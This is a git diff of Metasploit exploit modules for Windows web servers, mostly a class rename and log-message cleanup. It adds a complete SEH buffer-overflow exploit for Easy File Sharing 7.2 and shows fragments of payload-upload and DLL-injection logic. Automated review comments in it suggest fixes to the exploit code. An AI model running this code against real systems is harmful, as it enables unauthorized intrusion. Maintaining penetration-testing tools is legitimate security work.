b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb index 0d3a53e3de..a4f19815f1 100644 --- a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb +++ b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/altn_securitygateway.rb b/modules/exploits/windows/http/altn_securitygateway.rb index 88bd797a13..330a09117d 100644 --- a/modules/exploits/windows/http/altn_securitygateway.rb +++ b/modules/exploits/windows/http/altn_securitygateway.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking # XXX: Automatic targetting used HttpFingerprint = { :uri => '/SecurityGateway.dll', :pattern => [ /SecurityGateway / ] } diff --git a/modules/exploits/windows/http/altn_webadmin.rb b/modules/exploits/windows/http/altn_webadmin.rb index 7336b28f7b..62df0874e3 100644 --- a/modules/exploits/windows/http/altn_webadmin.rb +++ b/modules/exploits/windows/http/altn_webadmin.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb index 074f885b40..dc3171e2d5 100644 --- a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb +++ b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/apache_chunked.rb b/modules/exploits/windows/http/apache_chunked.rb index 4f305e2f1a..99a7f4e393 100644 --- a/modules/exploits/windows/http/apache_chunked.rb +++ b/modules/exploits/windows/http/apache_chunked.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking HttpFingerprint = { :pattern => [ /Apache/ ] } diff --git a/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb b/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb index 689f107920..d2f50d14d3 100644 --- a/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb +++ b/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb 
@@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/apache_modjk_overflow.rb b/modules/exploits/windows/http/apache_modjk_overflow.rb index 3569fe8827..add74bc934 100644 --- a/modules/exploits/windows/http/apache_modjk_overflow.rb +++ b/modules/exploits/windows/http/apache_modjk_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb b/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb index ac211221c8..690467f2e8 100644 --- a/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb +++ b/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -63,9 +63,9 @@ class Metasploit3 < Msf::Exploit::Remote cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") begin - print_warning("#{peer} - Removing #{@payload_path}") + print_warning("Removing #{@payload_path}") cli.fs.file.rm(@payload_path) - print_good("#{peer} - #{@payload_path} deleted") + print_good("#{@payload_path} deleted") rescue ::Exception => e print_error("Unable to delete #{@payload_path}: #{e.message}") end @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote # UPLOAD # attack_url = uri_path + "CCRWebClient/Wallboard/ImageUpload.ashx" - print_status("#{peer} - Uploading #{aspx_b64.length} bytes through #{attack_url}...") + print_status("Uploading #{aspx_b64.length} bytes through #{attack_url}...") res = send_request_cgi({ 'uri' => attack_url, 
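Review bot: In avaya_ccr_imageupload_exec.rb, the cleanup block in the `@@ -63,9` hunk still uses `rescue ::Exception => e`, which also catches `Interrupt` and `SystemExit`. An interrupt during `cli.fs.file.rm` would then be logged as "Unable to delete" instead of stopping the run. Since the neighbouring lines are already being edited, narrow it to `rescue ::StandardError => e`. The enclosing method starts outside the hunk, so confirm nothing relies on the broader rescue.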
@@ -137,9 +137,9 @@ class Metasploit3 < Msf::Exploit::Remote payload_url = "" @payload_path = "" if res and res.code == 200 and res.body =~ /"Key":"RadUAG_success","Value":true/ - print_good("#{peer} - Payload uploaded successfuly") + print_good("Payload uploaded successfuly") else - print_error("#{peer} - Payload upload failed") + print_error("Payload upload failed") return end @@ -147,15 +147,15 @@ class Metasploit3 < Msf::Exploit::Remote if res.body =~ /\{"Key":"RadUAG_filePath","Value":"(.*)"\},\{"Key":"RadUAG_associatedData/ @payload_path = $1 - print_status("#{peer} - Payload stored on #{@payload_path}") + print_status("Payload stored on #{@payload_path}") else - print_error("#{peer} - The payload file path couldn't be retrieved") + print_error("The payload file path couldn't be retrieved") end if res.body =~ /\[\{"Key":"UploadedImageURL","Value":"(.*)"\}\]/ payload_url = URI($1).path else - print_error("#{peer} - The payload URI couldn't be retrieved... Aborting!") + print_error("The payload URI couldn't be retrieved... Aborting!") return end @@ -163,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote # # EXECUTE # - print_status("#{peer} - Executing #{payload_url}...") + print_status("Executing #{payload_url}...") res = send_request_cgi({ 'uri' => payload_url, @@ -171,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (!res or (res and res.code != 200)) - print_error("#{peer} - Execution failed on #{payload_url} [No Response]") + print_error("Execution failed on #{payload_url} [No Response]") return end diff --git a/modules/exploits/windows/http/badblue_ext_overflow.rb b/modules/exploits/windows/http/badblue_ext_overflow.rb index 64898f93cc..8ea6438d3a 100644 --- a/modules/exploits/windows/http/badblue_ext_overflow.rb +++ b/modules/exploits/windows/http/badblue_ext_overflow.rb 
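Review bot: The success message rewritten in the `@@ -137,9` hunk of avaya_ccr_imageupload_exec.rb is misspelled: `print_good("Payload uploaded successfuly")` should be `print_good("Payload uploaded successfully")`. The line is already being changed here, so the typo can be fixed in the same edit. The surrounding method begins and ends outside the hunk.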
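Review bot: In the `@@ -171,7` hunk of avaya_ccr_imageupload_exec.rb, the message always ends in `[No Response]`, but the condition `!res or (res and res.code != 200)` is also true when the server answered with a non-200 status. Reporting what was actually received keeps the log accurate and easier to correlate with server-side records: `print_error("Execution failed on #{payload_url} [#{res ? res.code : 'No Response'}]")`. The enclosing method continues outside the hunk.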
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # NOTE: BadBlue doesn't give any HTTP headers when requesting '/'. diff --git a/modules/exploits/windows/http/badblue_passthru.rb b/modules/exploits/windows/http/badblue_passthru.rb index ac84d2ff34..841642ef04 100644 --- a/modules/exploits/windows/http/badblue_passthru.rb +++ b/modules/exploits/windows/http/badblue_passthru.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # NOTE: BadBlue doesn't give any HTTP headers when requesting '/'. diff --git a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb index 2119b57aab..f17d84ac56 100644 --- a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb +++ b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/bea_weblogic_post_bof.rb b/modules/exploits/windows/http/bea_weblogic_post_bof.rb index 6cf9e98863..e9fbfad2f7 100644 --- a/modules/exploits/windows/http/bea_weblogic_post_bof.rb +++ b/modules/exploits/windows/http/bea_weblogic_post_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache/ ] } diff --git a/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb b/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb index df52e63683..58e78c7b8d 100644 --- a/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb +++ b/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache/ ] } diff --git a/modules/exploits/windows/http/belkin_bulldog.rb b/modules/exploits/windows/http/belkin_bulldog.rb index a314fa36cf..0f139255d0 100644 --- a/modules/exploits/windows/http/belkin_bulldog.rb +++ b/modules/exploits/windows/http/belkin_bulldog.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb index 9f5251b4e1..05e2613719 100644 --- a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb +++ b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ca_igateway_debug.rb b/modules/exploits/windows/http/ca_igateway_debug.rb index c2bb5bdf61..4069ec878d 100644 --- a/modules/exploits/windows/http/ca_igateway_debug.rb +++ b/modules/exploits/windows/http/ca_igateway_debug.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb index bc48f73fd8..9fa5c4cec3 100644 --- a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb +++ b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/windows/http/cogent_datahub_command.rb b/modules/exploits/windows/http/cogent_datahub_command.rb index eab4067731..2fb6931fe2 100644 --- a/modules/exploits/windows/http/cogent_datahub_command.rb +++ b/modules/exploits/windows/http/cogent_datahub_command.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote # Exploitation is reliable, but the service hangs and needs manual restarting. Rank = ManualRanking @@ -392,10 +392,10 @@ class Metasploit3 < Msf::Exploit::Remote end def primer - print_status("#{peer} - Sending injection...") + print_status("Sending injection...") res = send_injection("\\\\\\\\#{@myhost}\\\\#{@share_name}\\\\#{@basename}.dll") if res - print_error("#{peer} - Unexpected answer") + print_error("Unexpected answer") end end @@ -433,10 +433,10 @@ class Metasploit3 < Msf::Exploit::Remote host = $1 share_name = $2 dll_name = $3 - print_status("#{peer} - Sending injection...") + print_status("Sending injection...") res = send_injection("\\\\\\\\#{host}\\\\#{share_name}\\\\#{dll_name}") if res - print_error("#{peer} - Unexpected answer") + print_error("Unexpected answer") end else fail_with(Failure::BadConfig, 'Bad UNCPATH format, should be \\\\host\\shared_folder\\base_name.dll') diff --git a/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb b/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb index e0865db4c7..11dc34709f 100644 --- a/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb +++ b/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/coldfusion_fckeditor.rb b/modules/exploits/windows/http/coldfusion_fckeditor.rb index 769d496259..4936809590 100644 --- a/modules/exploits/windows/http/coldfusion_fckeditor.rb +++ b/modules/exploits/windows/http/coldfusion_fckeditor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/windows/http/cyclope_ess_sqli.rb b/modules/exploits/windows/http/cyclope_ess_sqli.rb index 14427fd950..3ce543f576 100644 --- a/modules/exploits/windows/http/cyclope_ess_sqli.rb +++ b/modules/exploits/windows/http/cyclope_ess_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote path = File.dirname("#{target_uri.path}/.") b64_version = get_version(path) if b64_version.empty? - vprint_error("#{peer} - Unable to determine the version number") + vprint_error("Unable to determine the version number") else b64_version = Rex::Text.decode_base64(b64_version) if b64_version =~ /^[0-6]\.1/ @@ -131,11 +131,11 @@ class Metasploit3 < Msf::Exploit::Remote # b64_version = get_version(path) if b64_version.empty? - print_error("#{peer} - Unable to determine the version number") + print_error("Unable to determine the version number") return end - print_status("#{peer} - Obtained version: #{Rex::Text.decode_base64(b64_version)}") + print_status("Obtained version: #{Rex::Text.decode_base64(b64_version)}") # # Prepare our payload (naughty exe embedded in php) 
@@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote # # Inject payload # - print_status("#{peer} - Injecting PHP payload...") + print_status("Injecting PHP payload...") res = send_request_cgi({ 'method' => 'POST', 'uri' => path, @@ -163,10 +163,10 @@ class Metasploit3 < Msf::Exploit::Remote # # Load our payload # - print_status("#{peer} - Loading payload: #{path}#{b64_version}/#{@php_fname}") + print_status("Loading payload: #{path}#{b64_version}/#{@php_fname}") send_request_raw({'uri'=>"#{path}#{b64_version}/#{@php_fname}"}) if res and res.code == 404 - print_error("#{peer} - Server returned 404, the upload attempt probably failed.") + print_error("Server returned 404, the upload attempt probably failed.") return end diff --git a/modules/exploits/windows/http/desktopcentral_file_upload.rb b/modules/exploits/windows/http/desktopcentral_file_upload.rb index 040045c4b4..ea7669bbee 100644 --- a/modules/exploits/windows/http/desktopcentral_file_upload.rb +++ b/modules/exploits/windows/http/desktopcentral_file_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
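Review bot: In the `@@ -163,10` hunk of cyclope_ess_sqli.rb the return value of `send_request_raw` is discarded. The following `if res and res.code == 404` therefore appears to test the response of the earlier POST (`res = send_request_cgi(...)` in the `@@ -148,7` hunk), not the request issued just above it. Unless code between the two hunks reassigns `res`, the 404 message cannot describe this request. Assigning the result would make the check match its message: `res = send_request_raw({'uri'=>"#{path}#{b64_version}/#{@php_fname}"})`. The method starts and ends outside the hunk.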
@@ -83,15 +83,15 @@ class Metasploit3 < Msf::Exploit::Remote if res.body.to_s =~ /ManageEngine Desktop Central 7/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7 - print_status("#{peer} - Detected Desktop Central v7") + print_status("Detected Desktop Central v7") elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 8/ if res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v8 (later versions) build = $1 - print_status("#{peer} - Detected Desktop Central v8 #{build}") + print_status("Detected Desktop Central v8 #{build}") else # DC v8 (earlier versions) - print_status("#{peer} - Detected Desktop Central v8") + print_status("Detected Desktop Central v8") end elsif res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v9 (and higher?) build = $1 @@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - print_status("#{peer} - Uploading JSP to execute the payload") + print_status("Uploading JSP to execute the payload") exe = payload.encoded_exe exe_filename = rand_text_alpha_lower(8) + ".exe" @@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - JSP upload failed") end - print_status("#{peer} - Executing payload") + print_status("Executing payload") send_request_cgi( { 'uri' => normalize_uri(dropper_filename), diff --git a/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb b/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb index 4534cad6c1..ab88da7094 100644 --- a/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb +++ b/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
@@ -61,15 +61,15 @@ class Metasploit3 < Msf::Exploit::Remote if res.body.to_s =~ /ManageEngine Desktop Central 7/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7 - print_status("#{peer} - Detected Desktop Central v7") + print_status("Detected Desktop Central v7") elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 8/ if res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v8 (later versions) build = $1 - print_status("#{peer} - Detected Desktop Central v8 #{build}") + print_status("Detected Desktop Central v8 #{build}") else # DC v8 (earlier versions) - print_status("#{peer} - Detected Desktop Central v8") + print_status("Detected Desktop Central v8") end elsif res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v9 (and higher?) build = $1 @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Uploading JSP to execute the payload") + print_status("Uploading JSP to execute the payload") exe = payload.encoded_exe exe_filename = rand_text_alpha_lower(8) + ".exe" @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(exe_filename) register_files_for_cleanup("..\\webapps\\DesktopCentral\\#{jsp_name}") - print_status("#{peer} - Executing payload") + print_status("Executing payload") send_request_cgi( { 'uri' => normalize_uri(jsp_name), diff --git a/modules/exploits/windows/http/easyfilesharing_seh.rb b/modules/exploits/windows/http/easyfilesharing_seh.rb new file mode 100644 index 0000000000..4da86d6373 --- /dev/null +++ b/modules/exploits/windows/http/easyfilesharing_seh.rb 
@@ -0,0 +1,70 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Easy File Sharing HTTP Server 7.2 SEH Overflow', + 'Description' => %q{ + This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software. + }, + 'Author' => 'Starwarsfan2099 <starwarsfan2099[at]gmail.com>', + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'EDB', '39008' ], + ], + 'Privileged' => true, + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Payload' => + { + 'Space' => 390, + 'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Easy File Sharing 7.2 HTTP', { 'Ret' => 0x10019798 } ], + ], + 'DefaultOptions' => { + 'RPORT' => 80 + }, + 'DisclosureDate' => 'Dec 2 2015', + 'DefaultTarget' => 0)) + end + + def print_status(msg='') + super("#{peer} - #{msg}") + end + + def exploit + connect + print_status("Sending exploit...") + sploit = "GET " + sploit << rand_text_alpha_upper(4061) + sploit << generate_seh_record(target.ret) + sploit << make_nops(19) + sploit << payload.encoded + sploit << make_nops(7) + sploit << rand_text_alpha_upper(4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 20) + sploit << " HTTP/1.0\r\n\r\n" + sock.put(sploit) + print_good("Exploit Sent") + handler + disconnect + end +end diff --git a/modules/exploits/windows/http/easyftp_list.rb b/modules/exploits/windows/http/easyftp_list.rb index c7ef5b6ee7..0def8e6474 100644 --- a/modules/exploits/windows/http/easyftp_list.rb +++ b/modules/exploits/windows/http/easyftp_list.rb 
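Review bot: In the new easyfilesharing_seh.rb, the info hash in `initialize` defines `'DefaultOptions'` twice, first with `'EXITFUNC' => 'thread'` and later with `'RPORT' => 80`. Ruby keeps only the last value for a duplicated literal key, so the first setting is silently dropped; merge them into `'DefaultOptions' => { 'EXITFUNC' => 'thread', 'RPORT' => 80 },`. The metadata also disagrees about the affected product: `'Name'` says "HTTP Server" while `'Description'` says "FTP Server", which makes the module harder to match to the referenced advisory. Finally, the `print_status` override re-adds `"#{peer} - "` while the rest of this commit strips that prefix from callers, presumably because it is now added centrally. If so, the override should be removed to avoid a doubled prefix.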
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Easy-Web Server\// ] } diff --git a/modules/exploits/windows/http/edirectory_host.rb b/modules/exploits/windows/http/edirectory_host.rb index 7daa7bff70..9dd6288406 100644 --- a/modules/exploits/windows/http/edirectory_host.rb +++ b/modules/exploits/windows/http/edirectory_host.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/edirectory_imonitor.rb b/modules/exploits/windows/http/edirectory_imonitor.rb index ff37a76faa..b6b34663cd 100644 --- a/modules/exploits/windows/http/edirectory_imonitor.rb +++ b/modules/exploits/windows/http/edirectory_imonitor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /DHost\//, /HttpStk\// ] } # custom port diff --git a/modules/exploits/windows/http/efs_easychatserver_username.rb b/modules/exploits/windows/http/efs_easychatserver_username.rb index 06e9747b3f..6d763d06ed 100644 --- a/modules/exploits/windows/http/efs_easychatserver_username.rb +++ b/modules/exploits/windows/http/efs_easychatserver_username.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Easy Chat Server\/1\.0/ ] } @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote if not version return Exploit::CheckCode::Safe end - vprint_status "#{peer} - Found version: #{version}" + vprint_status "Found version: #{version}" if version !~ /^(2\.\d|3\.0|3\.1)$/ return Exploit::CheckCode::Safe end 
@@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote if not path return Exploit::CheckCode::Detected end - vprint_status "#{peer} - Found path: #{path}" + vprint_status "Found path: #{path}" return Exploit::CheckCode::Appears end @@ -104,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote # get target if target.name =~ /Automatic/ version = get_version - vprint_status "#{peer} - Found version: #{version}" if version + vprint_status "Found version: #{version}" if version if not version or version !~ /^(2\.\d|3\.0|3\.1)$/ fail_with(Failure::NoTarget, "#{peer} - Unable to automatically detect a target") elsif version =~ /(2\.0)/ @@ -122,12 +122,12 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "#{peer} - Could not retrieve install path") end path << "\\users\\" - vprint_status "#{peer} - Using path: #{path}" + vprint_status "Using path: #{path}" # send payload sploit = rand_text_alpha(256 - path.length) sploit << generate_seh_payload(my_target.ret) - print_status "#{peer} - Sending request (#{sploit.length} bytes) to target (#{my_target.name})" + print_status "Sending request (#{sploit.length} bytes) to target (#{my_target.name})" send_request_cgi({ 'uri' => '/chat.ghp', 'encode_params' => false, diff --git a/modules/exploits/windows/http/efs_fmws_userid_bof.rb b/modules/exploits/windows/http/efs_fmws_userid_bof.rb index ab43eac27d..1ddad4cad6 100644 --- a/modules/exploits/windows/http/efs_fmws_userid_bof.rb +++ b/modules/exploits/windows/http/efs_fmws_userid_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # Reliable memory corruption include Msf::Exploit::Remote::HttpClient 
@@ -78,10 +78,10 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri' => '/whatsnew.txt'}) if res && res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/ version = $1 - vprint_status "#{peer} - Found version: #{version}" + vprint_status "Found version: #{version}" elsif res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/ version = $1 - vprint_status "#{peer} - Based on Server header: #{version}" + vprint_status "Based on Server header: #{version}" end version @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote # Get target version to determine how to reach call/jmp esp # - print_status("#{peer} - Fingerprinting version...") + print_status("Fingerprinting version...") version = get_version if target.name =~ /Automatic/ @@ -118,11 +118,11 @@ class Metasploit3 < Msf::Exploit::Remote elsif version =~ /4\.0/ my_target = targets[2] end - print_good("#{peer} - Version #{version} found") + print_good("Version #{version} found") else my_target = target unless version && my_target.name.include?(version) - print_error("#{peer} - The selected target doesn't match the detected version, trying anyway...") + print_error("The selected target doesn't match the detected version, trying anyway...") end end @@ -142,7 +142,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit << [0x1002466D].pack("V") # Push eax > retn sploit << payload.encoded - print_status "#{peer} - Trying target #{my_target.name}..." + print_status "Trying target #{my_target.name}..." # # NOTE: Successful HTTP request is required to trigger diff --git a/modules/exploits/windows/http/ektron_xslt_exec.rb b/modules/exploits/windows/http/ektron_xslt_exec.rb index 3288d2c0d2..807f2ad8f2 100644 --- a/modules/exploits/windows/http/ektron_xslt_exec.rb +++ b/modules/exploits/windows/http/ektron_xslt_exec.rb 
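Review bot: In the `@@ -78,10` hunk of efs_fmws_userid_bof.rb the first branch is guarded with `res &&`, but the `elsif res.headers['server'] =~ ...` branch is not. If `send_request_raw` can return nil, as the first guard suggests, the second branch raises `NoMethodError` instead of returning no version. Guard it the same way: `elsif res && res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/`. The method's `def` line is outside the hunk.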
@@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/file_dropper' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ericom_access_now_bof.rb b/modules/exploits/windows/http/ericom_access_now_bof.rb index a69621f8e8..6693c11399 100644 --- a/modules/exploits/windows/http/ericom_access_now_bof.rb +++ b/modules/exploits/windows/http/ericom_access_now_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Sending malformed request...") + print_status("Sending malformed request...") send_request_raw({ 'method' => 'GET', 'uri' => exploit_uri, diff --git a/modules/exploits/windows/http/ezserver_http.rb b/modules/exploits/windows/http/ezserver_http.rb index 772d2e31aa..4b704d325e 100644 --- a/modules/exploits/windows/http/ezserver_http.rb +++ b/modules/exploits/windows/http/ezserver_http.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/fdm_auth_header.rb b/modules/exploits/windows/http/fdm_auth_header.rb index 6a396493ac..ba762f52b5 100644 --- a/modules/exploits/windows/http/fdm_auth_header.rb +++ b/modules/exploits/windows/http/fdm_auth_header.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # w/auth required: [*] x.x.x.x ( 401-Basic realm="FDM Remote control server" ) 
